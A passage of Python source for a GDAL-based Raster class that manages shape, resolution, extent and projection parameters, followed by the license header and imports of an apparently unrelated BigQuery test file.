'set_core' keyword argument as True when using Raster.set_param() to set a higher-level
(non-core) parameter.
Furthermore...
When setting a parameter that directly sets a value(s) in only one of the three Raster property
domains SHAPE, RESOLUTION, or EXTENT, it must be determined which of the other two properties
will be held constant (or as close as possible to constant in the case of changing SHAPE/EXTENT
when RESOLUTION is held constant). By default, EXTENT is preserved when setting SHAPE/RESOLUTION
and RESOLUTION is preserved when setting EXTENT. This behavior may be changed when setting any
applicable parameter by passing the 'hold' keyword argument as the name of the property you wish
to preserve ('shape', 'res', or 'extent').
Setting a parameter with Raster.set_param() in 'default mode' (by passing None as the 'value'
argument with the 'set_default' keyword argument set to True) will attempt to use the values of
other already-set parameters to determine a value for the new parameter. This is done to try to
keep the Raster in a self-consistent state. Getter methods for each parameter work to accomplish
this task, and may be used by themselves to extract wanted information from the Raster without
setting any unneeded parameters.
NOTE: These getter methods will give no warning if there are inconsistencies among the parameter
values, and should be used at the risk of the programmer.
Since no copying is done when setting parameters to values that are mutable objects, multiple
references may exist in a program that point to the value of a Raster parameter and one must be
careful. However, since it is highly beneficial to be able to make direct modifications to such
items (without copying, modifying, and passing the result into Raster.set_param() over and over),
calling Raster.prop_param() after making direct modifications to the value of a parameter will
essentially propagate those changes to other parameters in the Raster by forcing the getter
methods to ignore the modified parameter when looking for values that should be held constant
through the propagation.
At this time, changes are not propagated through to the pixel data parameter 'z' after z is set.
"""
def __init__(self, rasterFile_or_ds=None, *set_params):
self.ds = None
self.shape = None
self.z = None
self.x = None
self.y = None
self.dx = None
self.dy = None
self.res = None
self.geo_trans = None
self.corner_coords = None
self.proj_ref = None
self.spat_ref = None
self.geom = None
set_params_unique = list(set(set_params))
if 'all' in set_params_unique:
set_params_unique = ['ds', 'shape', 'z', 'x', 'y', 'dx', 'dy', 'res',
'geo_trans', 'corner_coords', 'proj_ref', 'spat_ref', 'geom']
if 'no-ds' in set_params:
if 'ds' in set_params_unique:
set_params_unique.remove('ds')
if 'no-ds' in set_params_unique:
set_params_unique.remove('no-ds')
if rasterFile_or_ds is not None:
self.set_param('ds', self.open_ds(rasterFile_or_ds))
if set_params_unique:
self.extract_and_set(*set_params_unique)
if 'ds' not in set_params_unique:
self.ds = None
elif set_params_unique:
if 'ds' in set_params_unique:
raise InvalidArgumentError("`ds` parameter cannot be set when `rasterFile_or_ds`"
" argument is None")
self.set_params(*set_params_unique)
@staticmethod
def open_ds(rasterFile_or_ds):
ds = None
if isinstance(rasterFile_or_ds, str):
if not os.path.isfile(rasterFile_or_ds):
raise RasterIOError("No such `rasterFile`: '{}'".format(rasterFile_or_ds))
ds = gdal.Open(rasterFile_or_ds, gdal.GA_ReadOnly)
elif type(rasterFile_or_ds) == osgeo.gdal.Dataset:
ds = rasterFile_or_ds
else:
raise InvalidArgumentError("Invalid input type for `rasterFile_or_ds`: {}".format(
type(rasterFile_or_ds)))
return ds
def extract_z(self):
return self.ds.GetRasterBand(1).ReadAsArray() if self.ds is not None else None
def extract_shape(self):
return (self.ds.RasterYSize, self.ds.RasterXSize) if self.ds is not None else None
def extract_geo_trans(self):
return np.array(self.ds.GetGeoTransform()) if self.ds is not None else None
def extract_proj_ref(self):
return self.ds.GetProjectionRef() if self.ds is not None else None
def wkt(self, corner_coords=None):
if corner_coords is None:
corner_coords = self.get_corner_coords()
return 'POLYGON (({}))'.format(
','.join([" ".join([str(c) for c in cc]) for cc in corner_coords])
)
def wkt_to_coords(self, wkt):
eval_str = 'np.array({})'.format(
wkt.replace('POLYGON ','').replace('(','[').replace(')',']').replace(',','],[').replace(' ',',')
)
return eval(eval_str)
def extract_param(self, pname):
if self.ds is None:
raise RasterIOError("Raster must have a raster dataset reference in its 'ds'"
" data member before parameters may be extracted")
pname = pname.lower()
value = None
if pname in ('shape', 'x', 'y', 'corner_coords'):
shape = self.extract_shape()
if pname in ('x', 'y', 'dx', 'dy', 'res', 'geo_trans', 'corner_coords'):
geo_trans = self.extract_geo_trans()
if pname in ('proj_ref', 'spat_ref'):
proj_ref = self.extract_proj_ref()
if pname == 'ds':
value = self.ds
elif pname == 'shape':
value = shape
elif pname == 'z':
value = self.extract_z()
elif pname == 'x':
value = geo_trans[0] + np.arange(shape[1]) * geo_trans[1]
elif pname == 'y':
value = geo_trans[3] + np.arange(shape[0]) * geo_trans[5]
elif pname == 'dx':
value = abs(geo_trans[1])
elif pname == 'dy':
value = abs(geo_trans[5])
elif pname == 'res':
value = abs(geo_trans[1]) if abs(geo_trans[1]) == abs(geo_trans[5]) else np.nan
elif pname == 'geo_trans':
value = geo_trans
elif pname == 'corner_coords':
value = self.get_corner_coords(geo_trans, shape)
elif pname == 'proj_ref':
value = proj_ref
elif pname == 'spat_ref':
value = osr.SpatialReference(proj_ref) if proj_ref is not None else None
elif pname == 'geom':
value = ogr.Geometry(wkt=self.wkt(self.extract_param('corner_coords')))
elif pname == 'geom_sr':
value = self.extract_param('geom')
spat_ref = self.extract_param('spat_ref')
if spat_ref is not None:
value.AssignSpatialReference(spat_ref)
else:
print("WARNING: Spatial reference could not be extracted from raster dataset,"
" so extracted geometry has not been assigned a spatial reference.")
else:
raise InvalidArgumentError("Invalid parameter for extraction: {}".format(pname))
return value
def extract_params(self, *params):
if self.ds is None:
raise RasterIOError("Raster must have a raster dataset reference in its 'ds'"
" data member before parameters may be extracted")
pset = set(params)
valid_pnames = vars(self).keys()
valid_pnames.append('geom_sr')
invalid_pnames = pset.difference(set(valid_pnames))
if invalid_pnames:
raise InvalidArgumentError("Invalid parameter(s) for extraction: {}".format(invalid_pnames))
if pset.intersection({'shape', 'x', 'y', 'corner_coords', 'geom', 'geom_sr'}):
shape = self.extract_shape()
if pset.intersection({'x', 'y', 'dx', 'dy', 'res', 'geo_trans', 'corner_coords', 'geom', 'geom_sr'}):
geo_trans = self.extract_geo_trans()
if pset.intersection({'proj_ref', 'spat_ref', 'geom_sr'}):
proj_ref = self.extract_proj_ref()
if pset.intersection({'corner_coords', 'geom', 'geom_sr'}):
corner_coords = self.get_corner_coords(geo_trans, shape)
if pset.intersection({'spat_ref', 'geom_sr'}):
spat_ref = osr.SpatialReference(proj_ref) if proj_ref is not None else None
if pset.intersection({'geom', 'geom_sr'}):
geom = ogr.Geometry(wkt=self.wkt(corner_coords))
value_list = []
for pname in params:
pname = pname.lower()
value = None
if pname == 'ds':
value = self.ds
elif pname == 'shape':
value = shape
elif pname == 'z':
value = self.extract_z()
elif pname == 'x':
value = geo_trans[0] + np.arange(shape[1]) * geo_trans[1]
elif pname == 'y':
value = geo_trans[3] + np.arange(shape[0]) * geo_trans[5]
elif pname == 'dx':
value = abs(geo_trans[1])
elif pname == 'dy':
value = abs(geo_trans[5])
elif pname == 'res':
value = abs(geo_trans[1]) if abs(geo_trans[1]) == abs(geo_trans[5]) else np.nan
elif pname == 'geo_trans':
value = geo_trans
elif pname == 'corner_coords':
value = corner_coords
elif pname == 'proj_ref':
value = proj_ref
elif pname == 'spat_ref':
value = spat_ref
elif pname == 'geom':
value = geom
elif pname == 'geom_sr':
value = geom.Clone() if 'geom' in params else geom
if spat_ref is not None:
value.AssignSpatialReference(spat_ref)
else:
print("WARNING: Spatial reference could not be extracted from raster dataset,"
" so extracted geometry has not been assigned a spatial reference.")
value_list.append(value)
return value_list
def set_params(self, *params):
set_core = False
params_copy = None
if 'all' in params:
params_copy = ('z', 'x', 'y', 'corner_coords', 'spat_ref', 'geom')
set_core = True
params_copy = tuple(set(params_copy))
for p in params_copy:
self.set_param(p, set_core=set_core)
def set_params_and_values(self, *pname_value):
pnames = list(pname_value[0::2])
values = pname_value[1::2]
if len(pnames) != len(values):
raise InvalidArgumentError("Unequal number of parameter names and parameter values")
valid_parameters = vars(self).keys()
for i in range(len(pnames)):
p = pnames[i]
if isinstance(p, str):
if p in valid_parameters:
continue
elif p == 'geom_sr':
pnames[i] = 'geom'
continue
raise InvalidArgumentError("Starting with the first argument, every other argument "
"must be a valid string name of a Raster parameter")
for i in range(len(pnames)):
exec('self.{} = values[{}]'.format(pnames[i], i))
def extract_and_set(self, *params):
self.set_params_and_values(*[a for b in zip(params, self.extract_params(*params)) for a in b])
def clear_params(self):
params = vars(self).keys()
params.remove('ds')
for p in params:
exec('self.{} = None'.format(p))
def get_shape(self, caller_function=None):
if self.shape is not None:
return self.shape
elif self.z is not None:
return self.z.shape
elif caller_function == 'get_res':
return None
xsize, ysize = None, None
if self.x is not None:
xsize = len(self.x)
if self.y is not None:
ysize = len(self.y)
if (xsize is None or ysize is None) and self.corner_coords is not None:
if xsize is None:
dx = self.get_res('dx', 'get_shape')
if not np.isnan(dx):
cc_x = self.corner_coords[:, 0]
if cc_x[2] is not None and cc_x[0] is not None:
xsize = (cc_x[2] - cc_x[0]) / dx
if ysize is None:
dy = self.get_res('dy', 'get_shape')
if not np.isnan(dy):
cc_y = self.corner_coords[:, 1]
if cc_y[2] is not None and cc_y[0] is not None:
ysize = -(cc_y[2] - cc_y[0]) / dy
if xsize is None:
xsize = 0
if ysize is None:
ysize = 0
return ysize, xsize
def get_res(self, param='res', caller_function=None):
if param not in ('dx', 'dy', 'res'):
raise InvalidArgumentError("Invalid `param` argument: {}".format(param))
value = eval('self.{}'.format(param))
if value is not None:
return value
if param in ('dx', 'dy'):
if self.res is not None and not np.isnan(self.res):
value = self.res
elif param == 'dx':
if self.geo_trans is not None:
value = self.geo_trans[1]
elif self.corner_coords is not None and caller_function != 'get_shape':
cc_x = self.corner_coords[:, 0]
shape = self.get_shape('get_res')
if shape is not None:
xsize = shape[1]
value = np.nan if xsize == 0 else (cc_x[2] - cc_x[0]) / xsize
elif self.x is not None:
value = (self.x[1] - self.x[0]) if len(self.x) > 1 else np.nan
elif param == 'dy':
if self.geo_trans is not None:
value = -self.geo_trans[5]
elif self.corner_coords is not None and caller_function != 'get_shape':
cc_y = self.corner_coords[:, 1]
shape = self.get_shape('get_res')
if shape is not None:
ysize = shape[0]
value = np.nan if ysize == 0 else -(cc_y[2] - cc_y[0]) / ysize
elif self.y is not None:
value = (self.y[0] - self.y[1]) if len(self.y) > 1 else np.nan
elif param == 'res':
dx = self.get_res('dx')
dy = self.get_res('dy')
value = dx if dx == dy else np.nan
if value is None:
value = np.nan
return value
def get_xmin_ymax(self):
xmin, ymax = None, None
if self.geo_trans is not None:
xmin, ymax = itemgetter(0, 3)(self.geo_trans)
elif self.corner_coords is not None:
xmin, ymax = self.corner_coords[0]
else:
if self.geom is not None:
corner_coords = self.wkt_to_coords(self.geom.ExportToWkt())
if corner_coords.shape[0] == 5:
xmin, ymax = corner_coords[0]
if xmin is None or ymax is None:
xmin = self.x[0] if (self.x is not None and len(self.x) > 0) else np.nan
ymax = self.y[0] if (self.y is not None and len(self.y) > 0) else np.nan
return np.array([xmin, ymax])
def get_xmax_ymin(self):
xmax, ymin = None, None
if self.corner_coords is not None:
xmax, ymin = self.corner_coords[2]
else:
if self.geom is not None:
corner_coords = self.wkt_to_coords(self.geom.ExportToWkt())
if corner_coords.shape[0] == 5:
xmax, ymin = corner_coords[2]
if xmax is None or ymin is None:
dx = self.get_res('dx')
dy = self.get_res('dy')
xmax = (self.x[-1] + dx) if (self.x is not None and len(self.x) > 0) else np.nan
ymin = (self.y[-1] - dy) if (self.y is not None and len(self.y) > 0) else np.nan
if np.isnan(xmax) or np.isnan(ymin):
xmin, ymax = self.get_xmin_ymax()
ysize, xsize = self.get_shape()
if np.isnan(xmax):
xmax = xmin + xsize*dx
if np.isnan(ymin):
ymin = ymax - ysize*dy
return np.array([xmax, ymin])
def get_x(self, xmin=None, xsize=None, dx=None):
if self.x is not None \
and (xmin is None and xsize is None and dx is None):
return self.x
else:
if xmin is None:
xmin = self.get_xmin_ymax()[0]
if xsize is None:
xsize = self.get_shape()[1]
if dx is None:
dx = self.get_res('dx')
x = xmin + np.arange(xsize)*dx
if xsize > 0:
x[0] = xmin
return x
def get_y(self, ymax=None, ysize=None, dy=None):
if self.y is not None \
and (ymax is None and ysize is None and dy is None):
return self.y
else:
if ymax is None:
ymax = self.get_xmin_ymax()[1]
if ysize is None:
ysize = self.get_shape()[0]
if dy is None:
dy = self.get_res('dy')
y = ymax - np.arange(ysize)*dy
if ysize > 0:
y[0] = ymax
return y
def get_geo_trans(self):
if self.geo_trans is not None:
return self.geo_trans
else:
xmin, ymax = self.get_xmin_ymax()
dx = self.get_res('dx')
dy = self.get_res('dy')
rot1, rot2 = 0, 0
geo_trans = np.array([
xmin,
dx,
rot1,
ymax,
rot2,
-dy
]).astype(float)
return geo_trans
def get_corner_coords(self, geo_trans=None, shape=None):
if geo_trans is None and self.corner_coords is not None:
return self.corner_coords
else:
if geo_trans is None and self.geom is not None:
corner_coords = self.wkt_to_coords(self.geom.ExportToWkt())
if corner_coords.shape[0] == 5:
return corner_coords
gt = geo_trans if geo_trans is not None else self.geo_trans
if gt is not None and (geo_trans is not None or (gt[2] != 0 or gt[4] != 0)):
top_left_x = np.full((5, 1), gt[0])
top_left_y = np.full((5, 1), gt[3])
top_left_mat = np.concatenate((top_left_x, top_left_y), axis=1)
ysize, xsize = shape if shape is not None else self.get_shape()
raster_XY_size_mat = np.array([
[0, 0],
[xsize, 0],
[xsize, ysize],
[0, ysize],
[0, 0]
])
gt_mat = np.array([
[gt[1], gt[4]],
[gt[2], gt[5]]
])
return top_left_mat + np.dot(raster_XY_size_mat, gt_mat)
else:
xmin, ymax = self.get_xmin_ymax()
xmax, ymin = self.get_xmax_ymin()
corner_coords = np.array([
[xmin, ymax],
[xmax, ymax],
[xmax, ymin],
[xmin, ymin],
[xmin, ymax]
])
return corner_coords
def get_proj_ref(self):
if self.proj_ref is not None:
return self.proj_ref
else:
proj_ref = None
spat_ref = self.spat_ref
if spat_ref is None and self.geom is not None:
spat_ref = self.geom.GetSpatialReference()
if spat_ref is not None:
proj_ref = spat_ref.ExportToWkt()
return proj_ref
def get_spat_ref(self):
if self.spat_ref is not None:
return self.spat_ref
else:
spat_ref = None
if self.proj_ref is not None:
spat_ref = osr.SpatialReference(self.proj_ref)
elif self.geom is not None:
spat_ref = self.geom.GetSpatialReference()
return spat_ref
def get_geom(self):
if self.geom is not None:
return self.geom
else:
geom_cc = self.get_corner_coords()
if np.any(np.isnan(geom_cc)):
geom_cc = np.array([[0, 0]])
geom = ogr.Geometry(wkt=self.wkt(geom_cc))
spat_ref = self.spat_ref
if spat_ref is None and self.proj_ref is not None:
spat_ref = osr.SpatialReference(self.proj_ref)
if spat_ref is not None:
geom.AssignSpatialReference(spat_ref)
return geom
def set_shape(self, shape, hold, set_core=True):
if type(shape) not in (tuple, list) or len(shape) != 2 \
or False in [(type(n) in (int, long) and n >= 0) for n in shape]:
raise InvalidArgumentError("`shape` must be a numeric tuple or list of length 2")
if hold != 'off':
new_ysize, new_xsize = shape
xmin, ymax = self.get_xmin_ymax()
dx = None
dy = None
if hold == 'res':
dx = self.get_res('dx')
dy = self.get_res('dy')
self.set_extent((xmin, ymax), (xmin + new_xsize*dx, ymax - new_ysize*dy), 'off', False)
elif hold == 'extent':
xmax, ymin = self.get_xmax_ymin()
new_dx = (xmax-xmin)/new_xsize
new_dy = (ymax-ymin)/new_ysize
self.set_res('dx', new_dx, 'off', False)
self.set_res('dy', new_dy, 'off', False)
dx, dy = new_dx, new_dy
else:
raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold))
if self.x is not None and new_xsize != len(self.x):
self.set_param('x', self.get_x(xmin, new_xsize, dx), False)
if self.y is not None and new_ysize != len(self.y):
self.set_param('y', self.get_y(ymax, new_ysize, dy), False)
if self.shape is not None or set_core:
self.shape = shape
def set_res(self, pname, res, hold, set_core=True, skip_gt=False):
if pname not in ('dx', 'dy', 'res'):
raise InvalidArgumentError("Invalid `pname` argument: {}".format(pname))
if not isinstance(res, numbers.Number) or res < 0 or res == float('inf'):
raise InvalidArgumentError("{} must be a positive, finite number".format(pname))
new_dx = res if pname in ('dx', 'res') else self.get_res('dx')
new_dy = res if pname in ('dy', 'res') else self.get_res('dy')
if hold != 'off':
xmin, ymax = self.get_xmin_ymax()
ysize, xsize = None, None
if hold == 'shape':
ysize, xsize = self.get_shape()
self.set_extent((xmin, ymax), (xmin + xsize*new_dx, ymax - ysize*new_dy), 'off', False)
elif hold == 'extent':
xmax, ymin = self.get_xmax_ymin()
new_xsize = (xmax-xmin)/new_dx
new_ysize = (ymax-ymin)/new_dy
new_xsize = int(new_xsize) if not np.isnan(new_xsize) else 0
new_ysize = int(new_ysize) if not np.isnan(new_ysize) else 0
self.set_shape((new_ysize, new_xsize), 'off', False)
self.set_extent((xmin, ymax), (xmin + new_xsize*new_dx, ymax - new_ysize*new_dy), 'off', False)
ysize, xsize = new_ysize, new_xsize
else:
raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold))
if self.x is not None and len(self.x) > 1 and new_dx != (self.x[1]-self.x[0]):
self.set_param('x', self.get_x(xmin, xsize, new_dx), False)
if self.y is not None and len(self.y) > 1 and new_dy != (self.y[0]-self.y[1]):
self.set_param('y', self.get_y(ymax, ysize, new_dy), False)
if not skip_gt and (self.geo_trans is not None or set_core):
if self.geo_trans is None:
self.set_param('geo_trans')
new_geo_trans = np.array([
self.geo_trans[0],
new_dx,
self.geo_trans[2],
self.geo_trans[3],
self.geo_trans[4],
-new_dy
])
self.set_param('geo_trans', new_geo_trans, False)
if eval('self.{}'.format(pname)) is not None or set_core:
exec('self.{} = res'.format(pname))
if pname == 'res':
if self.dx is not None or set_core:
self.dx = res
if self.dy is not None or set_core:
self.dy = res
elif self.res is not None or set_core:
if self.dx == self.dy and self.dx is not None:
self.res = self.dx
else:
self.res = np.nan
def set_extent(self, xmin_ymax, xmax_ymin, hold, set_core=True,
skip_gt=False, skip_cc=False, skip_geom=False):
if hold in ('off', 'shape', 'res'):
pass
elif hold is None and xmax_ymin is None:
pass
else:
raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold))
arg_check = [np.array(xmin_ymax)]
if xmax_ymin is None:
# Translation will be performed.
hold = None
else:
arg_check.append(np.array(xmax_ymin))
if True in [(p.ndim != 1 or len(p) != 2 or not np.issubdtype(p.dtype, np.number))
for p in arg_check]:
raise InvalidArgumentError("`xmin_ymax`, `xmax_ymin` must be convertible into a "
"numeric numpy.ndarray with ndim=1 and length 2")
new_xmin, new_ymax = xmin_ymax
new_xmax, new_ymin = None, None
if xmax_ymin is not None:
new_xmax, new_ymin = xmax_ymin
else:
ysize, xsize = self.get_shape()
new_xmax = new_xmin + xsize*self.get_res('dx')
new_ymin = new_ymax - ysize*self.get_res('dy')
littleX = True if (self.x is not None and len(self.x) < 2) else False
littleY = True if (self.y is not None and len(self.y) < 2) else False
if hold != 'off':
ysize, xsize = None, None
dx = None
dy = None
if hold == 'shape':
ysize, xsize = self.get_shape()
new_dx = (new_xmax-new_xmin)/xsize
new_dy = (new_ymax-new_ymin)/ysize
self.set_res('dx', new_dx, 'off', False)
self.set_res('dy', new_dy, 'off', False)
dx, dy = new_dx, new_dy
elif hold == 'res':
dx = self.get_res('dx')
dy = self.get_res('dy')
new_xsize = (new_xmax-new_xmin)/dx
new_ysize = (new_ymax-new_ymin)/dy
new_xsize = int(new_xsize) if not np.isnan(new_xsize) else 0
new_ysize = int(new_ysize) if not np.isnan(new_ysize) else 0
self.set_shape((new_ysize, new_xsize), 'off', False)
new_xmax = new_xmin + new_xsize*dx
new_ymin = new_ymax - new_ysize*dy
ysize, xsize = new_ysize, new_xsize
if hold is None:
# Perform translation.
if xmax_ymin is None:
if not littleX and self.x is not None and new_xmin != self.x[0]:
self.set_param('x', self.x + (new_xmin - self.x[0]), False)
self.x[0] = new_xmin
if not littleY and self.y is not None and new_ymax != self.y[0]:
self.set_param('y', self.y + (new_ymax - self.y[0]), False)
self.y[0] = new_ymax
else:
if not littleX and self.x is not None \
and (new_xmin != self.x[0] or new_xmax != (self.x[-1] + (self.x[1] - self.x[0]))):
self.set_param('x', self.get_x(new_xmin, xsize, dx), False)
if not littleY and self.y is not None \
and (new_ymax != self.y[0] or new_ymin != (self.y[-1] - (self.y[0] - self.y[1]))):
self.set_param('y', new_ymax - np.arange(ysize)*dy, False)
if littleX and len(self.x) == 1:
self.set_param('x', self.get_x(new_xmin, 1, 0), False)
if littleY and len(self.y) == 1:
self.set_param('y', self.get_y(new_ymax, 1, 0), False)
if not skip_gt and (self.geo_trans is not None or set_core):
if self.geo_trans is None:
self.set_param('geo_trans')
new_geo_trans = np.array([
new_xmin,
self.geo_trans[1],
self.geo_trans[2],
new_ymax,
self.geo_trans[4],
self.geo_trans[5]
])
self.set_param('geo_trans', new_geo_trans, False)
if not (skip_cc and skip_geom) and (self.corner_coords is not None or self.geom is not None):
corner_coords = np.array([
[new_xmin, new_ymax],
[new_xmax, new_ymax],
[new_xmax, new_ymin],
[new_xmin, new_ymin],
[new_xmin, new_ymax]
])
if not skip_cc and self.corner_coords is not None:
self.set_param('corner_coords', corner_coords, False)
if not skip_geom and self.geom is not None:
spat_ref = self.geom.GetSpatialReference()
geom_cc = corner_coords if not np.any(np.isnan(corner_coords)) else np.array([[0, 0]])
self.set_param('geom', ogr.Geometry(wkt=self.wkt(geom_cc)), False)
if spat_ref is not None:
self.geom.AssignSpatialReference(spat_ref)
def set_projection(self, proj_ref, set_core=True, skip_sr=False, skip_geom=False):
try:
spat_ref = osr.SpatialReference(proj_ref)
spat_ref.IsProjected()
except:
raise InvalidArgumentError("`proj_ref` must be a WKT projection string that can be "
"converted into an osgeo.osr.SpatialReference object")
if not skip_sr and self.spat_ref is not None:
self.set_param('spat_ref', spat_ref, False)
if not skip_geom and self.geom is not None:
self.geom.AssignSpatialReference(spat_ref)
if self.proj_ref is not None or set_core:
self.proj_ref = proj_ref
def set_param(self, pname, value=None, prop=True, hold=None, set_core=False, set_default=True):
if pname not in vars(self).keys():
raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname))
if value is None:
# Set default value for parameter.
if not set_default:
return
elif eval('self.{}'.format(pname)) is not None:
# The parameter is already set. Without a value argument, there is nothing to do.
print("This Raster's '{}' data member is already set".format(pname))
return
elif isinstance(value, str) and value == 'extract':
value = self.extract_param(pname)
if value is None:
prop = False
if not prop:
hold = 'off'
if set_core:
prop = True
errmsg = None
if pname in ('all', 'no-ds'):
pass
elif pname == 'ds':
if value is None:
raise InvalidArgumentError("`ds` has no default to be set")
ds = value
if type(ds) != osgeo.gdal.Dataset:
errmsg = "{} must be an osgeo.gdal.Dataset"
else:
self.ds = ds
elif pname == 'shape':
shape = value if value is not None else self.get_shape()
if hold is None:
hold = 'extent'
self.set_shape(shape, hold)
elif pname == 'z':
z = value if value is not None else np.zeros(self.get_shape())
if type(z) != np.ndarray or not np.issubdtype(z.dtype, np.number) or z.ndim != 2:
errmsg = "{} must be a numeric numpy.ndarray with ndim=2".format(pname)
else:
if prop:
if hold is None:
hold = 'extent'
self.set_shape(z.shape, hold, set_core)
self.z = z
elif pname == 'x':
x = value if value is not None else self.get_x()
if type(x) != np.ndarray or not np.issubdtype(x.dtype, np.number) or x.ndim != 1 \
or (len(x) > 1 and np.any(~np.isnan(x)) \
and len(np.unique(np.round((x[1:] - x[:-1]), 8))) > 1):
errmsg = "{} must be a numeric numpy.ndarray with ndim=1 and regular spacing".format(pname)
else:
if prop:
old_ysize, old_xsize = self.get_shape()
old_dx = self.get_res('dx')
old_xmin, old_ymax = self.get_xmin_ymax()
old_xmax, old_ymin = self.get_xmax_ymin()
new_xsize = len(x)
new_dx = None
if len(x) == 0:
new_dx = np.nan
elif len(x) == 1:
new_dx = old_dx
else:
new_dx = (x[1] - x[0])
new_xmin = x[0] if len(x) > 0 else np.nan
new_xmax = new_xmin + new_xsize*new_dx
if new_xsize != old_xsize:
self.set_shape((old_ysize, new_xsize), 'off', set_core)
if new_dx != old_dx:
self.set_res('dx', new_dx, 'off', set_core)
if new_xmin != old_xmin or new_xmax != old_xmax:
self.set_extent((new_xmin, old_ymax), (new_xmax, old_ymin), 'off', set_core)
self.x = x
elif pname == 'y':
y = value if value is not None else self.get_y()
if type(y) != np.ndarray or not np.issubdtype(y.dtype, np.number) or y.ndim != 1 \
or (len(y) > 1 and np.any(~np.isnan(y)) \
and len(np.unique(np.round((y[1:] - y[:-1]), 8))) > 1):
errmsg = "{} must be of type numpy.ndarray with ndim=1 and regular spacing".format(pname)
else:
if prop:
old_ysize, old_xsize = self.get_shape()
old_dy = self.get_res('dy')
old_xmin, old_ymax = self.get_xmin_ymax()
old_xmax, old_ymin = self.get_xmax_ymin()
new_ysize = len(y)
new_dy = None
if len(y) == 0:
new_dy = np.nan
elif len(y) == 1:
new_dy = old_dy
else:
new_dy = (y[0] - y[1])
new_ymax = y[0] if len(y) > 0 else np.nan
new_ymin = new_ymax - new_ysize*new_dy
if new_ysize != old_ysize:
self.set_shape((new_ysize, old_xsize), 'off', set_core)
if new_dy != old_dy:
self.set_res('dy', new_dy, 'off', set_core)
if new_ymax != old_ymax or new_ymin != old_ymin:
self.set_extent((old_xmin, new_ymax), (old_xmax, new_ymin), 'off', set_core)
self.y = y
elif pname in ('dx', 'dy', 'res'):
val = value if value is not None else self.get_res(pname)
if prop:
if hold is None:
hold = 'extent'
self.set_res(pname, value, hold)
else:
if not isinstance(val, numbers.Number) or val < 0 or val == float('inf'):
errmsg = "{} must be a positive, finite number".format(pname)
else:
exec('self.{} = val'.format(pname))
elif pname == "geo_trans":
geo_trans = value if value is not None else self.get_geo_trans()
if type(geo_trans) != np.ndarray or not np.issubdtype(geo_trans.dtype, np.number) \
or geo_trans.shape != (6,):
errmsg = "{} must be a numeric numpy.ndarray with shape (6,)".format(pname)
else:
if prop:
if hold is None:
hold = 'extent'
old_xmin, old_ymax = self.get_xmin_ymax()
old_dx = self.get_res('dx')
old_dy = self.get_res('dy')
new_xmin, new_ymax = itemgetter(0, 3)(geo_trans)
new_dx = geo_trans[1]
new_dy = -geo_trans[5]
if new_dx != old_dx:
self.set_res('dx', new_dx, hold, set_core, skip_gt=True)
if new_dy != old_dy:
self.set_res('dy', new_dy, hold, set_core, skip_gt=True)
if new_xmin != old_xmin or new_ymax != old_ymax:
self.set_extent((new_xmin, new_ymax), None, None, set_core, skip_gt=True)
self.geo_trans = geo_trans
elif pname == 'corner_coords':
corner_coords = value if value is not None else self.get_corner_coords()
if type(corner_coords) != np.ndarray or not np.issubdtype(corner_coords.dtype, np.number) \
or not corner_coords.shape == (5, 2):
errmsg = "{} must be a numeric numpy.ndarray with shape (5, 2)".format(pname)
else:
if prop:
if hold is None:
hold = 'res'
self.set_extent(corner_coords[0], corner_coords[2], hold, set_core, skip_cc=True)
self.corner_coords = corner_coords
elif pname == 'proj_ref':
proj_ref = value if value is not None else RASTER_DEFAULT_PROJREF
if prop:
self.set_projection(proj_ref)
else:
try:
spat_ref = osr.SpatialReference(proj_ref)
spat_ref.IsProjected()
self.proj_ref = proj_ref
except:
raise InvalidArgumentError("{} must be a WKT projection string that can be"
" converted into an osgeo.osr.SpatialReference"
" object".format(pname))
elif pname == 'spat_ref':
spat_ref = value if value is not None else osr.SpatialReference(RASTER_DEFAULT_PROJREF)
try:
if type(spat_ref) != osgeo.osr.SpatialReference:
raise InvalidArgumentError
spat_ref.IsProjected()
except:
errmsg = "{} must be a projected osgeo.osr.SpatialReference object".format(pname)
if errmsg is None:
if prop:
self.set_projection(spat_ref.ExportToWkt(), set_core, skip_sr=True)
self.spat_ref = spat_ref
elif pname in ('geom', 'geom_sr'):
geom = value if value is not None else self.get_geom()
try:
if type(geom) != osgeo.ogr.Geometry \
or geom.GetDimension() != 2 or geom.GetCoordinateDimension() != 2:
raise InvalidArgumentError
wkt = geom.ExportToWkt()
if len(wkt.split(',')) != 5:
prop = False
except:
errmsg = "{} must be a 2D osgeo.ogr.Geometry object"\
" containing 5 pairs of 2D coordinates".format(pname)
if errmsg is None:
if prop:
if hold is None:
hold = 'res'
corner_coords = self.wkt_to_coords(wkt)
self.set_extent(corner_coords[0], corner_coords[2], hold, set_core, skip_geom=True)
spat_ref = self.geom.GetSpatialReference()
if spat_ref is not None:
self.set_projection(spat_ref.ExportToWkt(), set_core, skip_geom=True)
self.geom = geom
else:
errmsg = "No setter mechanism has been implemented yet for parameter '{}'".format(pname)
if errmsg is not None:
if value is not None:
raise InvalidArgumentError(errmsg)
else:
raise RasterIOError(errmsg)
def refresh_param(self, pname):
if pname not in vars(self).keys():
raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname))
exec('self.{} = None'.format(pname))
self.set_param(pname)
def prop_param(self, pname, hold=None, set_core=False):
if pname not in vars(self).keys():
raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname))
value = eval('self.{}'.format(pname))
if value is None:
print("No value is stored in this Raster's '{}' parameter to propagate".format(pname))
return
exec('self.{} = None'.format(pname))
self.set_param(pname, value, True, hold, set_core, False)
|
py | 1a3f918eb14b3453bf006deb06ca69d28df59e6a | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import functools
import operator
import queue
import warnings
import pkg_resources
import mock
try:
import pandas
import pandas.api.types
import pandas.testing
except ImportError: # pragma: NO COVER
pandas = None
import pyarrow
import pyarrow.types
try:
import geopandas
except ImportError: # pragma: NO COVER
geopandas = None
import pytest
from google import api_core
from google.cloud import bigquery_storage
from google.cloud.bigquery import _helpers
from google.cloud.bigquery import schema
